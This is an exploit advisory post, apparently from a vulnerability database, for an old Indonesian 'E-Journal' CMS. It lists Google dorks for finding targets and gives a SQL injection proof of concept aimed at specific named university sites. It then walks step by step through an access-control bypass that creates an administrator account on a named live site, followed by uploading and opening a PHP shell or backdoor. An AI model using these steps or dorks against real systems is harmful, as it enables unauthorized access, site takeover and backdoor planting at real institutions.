E-Journal 1.0 Shell Upload / SQL Injection

2014.12.18
Credit: X-Cisadane
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-264
Dork: inurl:mahasiswa.php intitle:E-Journal

========================================================================================== E-Journal (Old Version) Multiple Vulnerabilities ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities : # Date : 17th December 2014 : # Author : X-Cisadane : # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/ : # Version : Old Version : # CMS Language : Indonesian : # Category : Web Applications : # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability : # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English) : # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari :-------------------------------------------------------------------------------------------------------------------------: DORKS (How to find the target) : ================================ inurl:mahasiswa.php intitle:E-Journal inurl:dosen.php intitle:E-Journal inurl:jurnal.php intitle:E-Journal inurl:dokumen.php intitle:E-Journal "Karya Tulis Mahasiswa" intitle:E-Journal "Design & Programming by" intitle:E-Journal "E-Journal adalah aplikasi berbasis web untuk" Or use your own Google Dorks :) P.S : This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu). Proof of Concept ================ [ 1 ] SQL Injection POC : http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi] Example : http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133 http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133 http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133 http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133 http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133 ...etc... [ 2 ] Privilege Escalation You can create a new Administrator Account by Using this Trick. For Example my Target is : http://www.ejournal-fisipunla.com/ Step 1 : Add data.php?tambah=dosen in the URL So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR". Ignore that Notice and click Admin Menu. Screenshot #1 : http://i59.tinypic.com/54he2b.png Step 3 : Tadaaa... Now you can add an Administrator Account. Screenshot #2 : http://i59.tinypic.com/2i8vyus.png [ 3 ] Upload PHP File (PHP Shell / Backdoor) After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File. Admin Control Panel Path : http://[Site]/[Path]/admin.php Example : http://www.ejournal-fisipunla.com/admin.php Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen Upload your Php File in the File and Cover form. Screenshot #3 : http://i59.tinypic.com/24cxhrc.png Open your Backdoor / PHP Shell in : http://[Site]/[Path]/cover/your php file name.php http://[Site]/[Path]/file/your php file name.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top